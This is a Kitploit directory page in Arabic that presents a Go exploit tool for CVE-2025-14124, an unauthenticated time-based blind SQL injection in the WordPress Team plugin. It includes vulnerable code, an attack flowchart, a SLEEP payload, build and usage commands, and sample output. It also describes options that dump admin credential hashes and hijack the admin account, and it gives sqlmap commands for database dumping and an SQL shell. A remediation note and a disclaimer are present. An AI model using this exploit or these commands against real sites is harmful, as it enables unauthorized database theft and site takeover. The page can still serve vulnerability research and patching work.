Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-14124 — حقن SQL بدون مصادقة (أعمى قائم على الوقت) | Kitploit
أدوات/GitHubGitHub/hyunchiya/cve-2025-14124
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubhyunchiya/cve-2025-14124

CVE-2025-14124

حقن SQL بدون مصادقة (أعمى قائم على الوقت)

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-14124

إضافة WordPress Team Plugin - حقن SQL بدون مصادقة

المؤلف: Hyun Chiya


معلومات الثغرة

الحقلالقيمة
معرف CVECVE-2025-14124
الإضافةWordPress Team Plugin
الإصدارات المتأثرة< 5.0.11
نوع الثغرةحقن SQL بدون مصادقة (أعمى قائم على الوقت)
درجة الخطورةعالية

الوصف

لا تقوم إضافة WordPress Team Plugin بتعقيم وتهريب المعامل search بشكل صحيح قبل استخدامه في عبارة SQL عبر إجراء AJAX متاح للمستخدمين غير المصادَق عليهم، مما يؤدي إلى حقن SQL.

تحليل السبب الجذري

الكود القابل للاستغلال موجود في app/Controllers/Frontend/Ajax/LoadMore.php:

root@kitploit:~
// Line 221 - User input sanitized but NOT SQL-escaped
$sAction = sanitize_text_field( wp_unslash( $_REQUEST['search'] ) );

// Line 437-438 - VULNERABLE: Direct SQL concatenation
function tlp_team_search_where( $where ) {
    global $wpdb;
    $term = $wpdb->esc_like( $this->s['s'] );  // ⚠️ esc_like only escapes %, _, \
    $where .= "OR ({$wpdb->posts}.post_title LIKE '%{$term}%' ...)";  // ⚠️ SQLi!
}

المشكلة: $wpdb->esc_like() يهرب فقط رموز البدل (Wildcards) الخاصة بـ LIKE، وليس الرموز الخاصة بحقن SQL.

سير الاستغلال

root@kitploit:~
flowchart TD
    A["Attacker finds page with [tlpteam] shortcode"] --> B["Extract tlp_nonce and data-sc-id"]
    B --> C["POST to /wp-admin/admin-ajax.php"]
    C --> D["action=ttp_Layout_Ajax_Action<br/>search=SQL_PAYLOAD"]
    D --> E{"Nonce valid?"}
    E -->|Yes| F["SQL query executed with payload"]
    F --> G["Time-based detection via SLEEP()"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff
    style G fill:#51cf66,stroke:#2f9e44,color:#fff

المتطلبات الأساسية

  1. الهدف مثبّت عليه إضافة WordPress Team Plugin (إصدار أقل من 5.0.11)
  2. يجب وجود صفحة تحتوي على الكود المختصر [tlpteam]
  3. يجب إنشاء عضو فريق واحد على الأقل في الإضافة

البناء

root@kitploit:~
go build -o CVE-2025-14124.exe main.go

الاستخدام

الكشف التلقائي عن صفحة الفريق

root@kitploit:~
.\CVE-2025-14124.exe -u http://target.com

تحديد عنوان صفحة الفريق

root@kitploit:~
.\CVE-2025-14124.exe -u http://target.com --page-url http://target.com/our-team/

فحص الإضافة فقط

root@kitploit:~
.\CVE-2025-14124.exe -u http://target.com --check-only

تأخير مخصص لأمر SLEEP

root@kitploit:~
.\CVE-2025-14124.exe -u http://target.com --delay 5

الخيارات

وضع استخراج البيانات (--dump)

عند استخدام --dump، ستقوم الأداة باستخراج:

  • إصدار قاعدة البيانات
  • اسم قاعدة البيانات الحالية
  • مستخدم قاعدة البيانات
  • بادئة جداول ووردبريس
  • اسم مستخدم المسؤول
  • تجزئة كلمة مرور المسؤول
  • البريد الإلكتروني للمسؤول

ملاحظة: استخراج البيانات بطيء بسبب طبيعة حقن SQL الأعمى القائم على الوقت (~5-15 دقيقة للاستخراج الكامل).

وضع اختطاف المسؤول (--create-admin)

محاولة تغيير كلمة مرور المسؤول الحالية عبر استعلام SQL UPDATE.

⚠️ مهم: يتطلب هذا الوضع دعم الاستعلامات المكدسة (stacked queries)، وهو معطل عادةً في PHP+MySQL. إذا لم تكن الاستعلامات المكدسة مدعومة، فاستخدم --dump لاستخراج بيانات الاعتماد بدلاً من ذلك، أو استخدم sqlmap --sql-shell لتنفيذ UPDATE مباشرة.

مثال للإخراج

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14124 - WordPress Team Plugin SQL Injection                                ║
    ║   Affected: tlp-team < 5.0.11                                                         ║
    ║   Author: Hyun Chiya                                                                  ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]

[*] Checking if WordPress Team Plugin is active...
[+] Plugin detected: /wp-content/plugins/tlp-team/readme.txt
[+] Plugin detected!

[*] Searching for page with tlpteam shortcode...
[+] Found team page: http://target.com/our-team/
[+] Target page: http://target.com/our-team/

[+] Extracted nonce: abc123def456
[+] Extracted scID: 42

============================================================
[*] EXPLOIT: Time-Based Blind SQL Injection
============================================================

[*] Payload: t' OR SLEEP(3) OR 't'='t
[*] Expected delay: ~9 seconds (SLEEP executes 3 times)

[*] Sending malicious request...
[*] Response time: 9.23 seconds

[+] SQL INJECTION CONFIRMED!
[+] Response delayed by ~9 seconds (expected: 9)

[!] The target is vulnerable to Time-Based Blind SQL Injection
[!] Database can be extracted using tools like sqlmap

[*] Done.

الاستخدام مع SQLMap

للاستغلال المتقدم، يمكنك استخدام sqlmap بعد تأكيد الثغرة:

root@kitploit:~
# Dump database
sqlmap -u "http://target.com/wp-admin/admin-ajax.php" \
  --data="action=ttp_Layout_Ajax_Action&scID=32&tlp_nonce=NONCE&search=test" \
  -p search --dbms=mysql --technique=T --batch --dump

# SQL Shell (for UPDATE queries)
sqlmap -u "http://target.com/wp-admin/admin-ajax.php" \
  --data="action=ttp_Layout_Ajax_Action&scID=32&tlp_nonce=NONCE&search=test" \
  -p search --dbms=mysql --technique=T --sql-shell

المعالجة

⚠️ هام: قم بتحديث إضافة WordPress Team Plugin إلى الإصدار 5.0.11 أو أحدث حيث تم إصلاح الثغرة باستخدام تهريب SQL صحيح عبر $wpdb->prepare().

المراجع

  • قاعدة بيانات ثغرات WPScan

إخلاء المسؤولية

هذه الأداة مقدمة للأغراض التعليمية واختبارات الأمان المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها بمسؤولية.

المؤلف

Hyun Chiya

تنزيل الأداة
المعاملالوصف
-uعنوان URL الخاص بموقع ووردبريس المستهدف (مطلوب)
--page-urlعنوان الصفحة التي تحتوي على الكود المختصر tlpteam
--delayثواني SLEEP للكشف (الافتراضي: 1)
--dumpاستخراج معلومات قاعدة البيانات وبيانات اعتماد مسؤول ووردبريس
--create-adminمحاولة اختطاف حساب المسؤول (يتطلب استعلامات مكدسة)
--admin-userاسم المستخدم لاختطاف المسؤول (الافتراضي: pwned_admin)
--admin-passكلمة المرور لاختطاف المسؤول (الافتراضي: Pwned123!)
--check-onlyفحص ما إذا كانت الإضافة نشطة فقط
--timeoutمهلة الطلب بالثواني (الافتراضي: 120)